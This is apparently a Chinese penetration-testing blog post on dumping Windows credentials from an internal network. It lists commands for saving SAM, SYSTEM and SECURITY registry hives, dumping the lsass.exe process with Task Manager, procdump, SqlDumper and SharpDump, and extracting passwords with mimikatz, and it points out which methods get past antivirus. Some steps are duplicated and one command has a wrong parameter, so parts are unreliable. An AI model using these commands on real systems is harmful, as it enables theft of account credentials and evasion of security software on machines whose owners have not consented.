内网渗透基于hash凭证抓取
1. minikatz抓取(在线与离线)需要高权限
离线模式:
(1)minikatz:
- 通过注册表导出凭证文件(目标机器)
- reg save HKLM\SYSTEM SystemBkup.hiv
- reg save HKLM\SAM SamBkup.hiv
- 把抓取到的凭证文件下载到本地,在本地使用minikatz破解
- lsadump::sam /system:SystemBkup.hiv /system:SamBkup.hiv
注:当操作系统是win8.1或者2012R2以上的时候无法抓取到明文密码,需要修改注册表
(2)secretsdump:
- 通过注册表导出凭证文件(目标机器)
- cd %temp% //进入临时文件目录
- reg save HKLM\SYSTEM Sys.hiv
- reg save HKLM\SAM Sam.hiv
- reg save HKLM\security security.hiv
(3)minikatz内部转储(离线模式,可过杀软)
- 在任务管理器中找到lsass.exe,右键创建转储文件
- 把抓取到的凭证文件下载到本地,在本地使用minikatz破解
minikatz.exe “sekurlsa::minidump lsass.dum” “sekurlsa::logonPasswords full” exit
- 把抓取到的凭证文件下载到本地,在本地使用minikatz破解
(4)Procdump(目前已被杀软标记)
- procdump导出凭证文件(目标机器)
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
- procdump导出凭证文件(目标机器)
- 把抓取到的凭证文件下载到本地,在本地使用minikatz破解
minikatz# sekurlsa::minidump lsass.dum
minikatz# sekurlsa::logonPasswords full
- 把抓取到的凭证文件下载到本地,在本地使用minikatz破解
2. SqlDumper(离线模式,可过绝大部分杀软)
sqldumper.exe 微软实用调试程序
默认存放路径:
盘符:\Program Files\Microsoft SQL Server\版本号\Shared
使用方法:
查询lsass.exe进程PID
tasklist /svc | findstr lsass.exe导出dump文件
方法一:Sqldumper.exe PID 0 0X01100 #导出dump文件到当前目录(必须有可读写权限)
方法二:Sqldumper.exe PID 0 0X01100 0 C:\Users\…. #导出到指定目录下载dump文件到本地,使用minikatz加载dump文件
minikatz.exe “sekurlsa::mindump SQLDmpr0001.mdmp” “sekurlsa::logonPasswords full” “exit” >> info.txt
注:如果目标机器上没有sqldumper.exe,可以自己上传一个
3. SharpDump(离线,过大部分杀软)
直接运行sharpdump.exe,转储lsass.exe进程
下载C:\Windows\Temp\debug.gz
利用minikatz提取凭证
minikatz.exe “sekurlsa::minidump debug.out” “sekurlsa::logonPasswords full”
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Xiaolitx's blog!
评论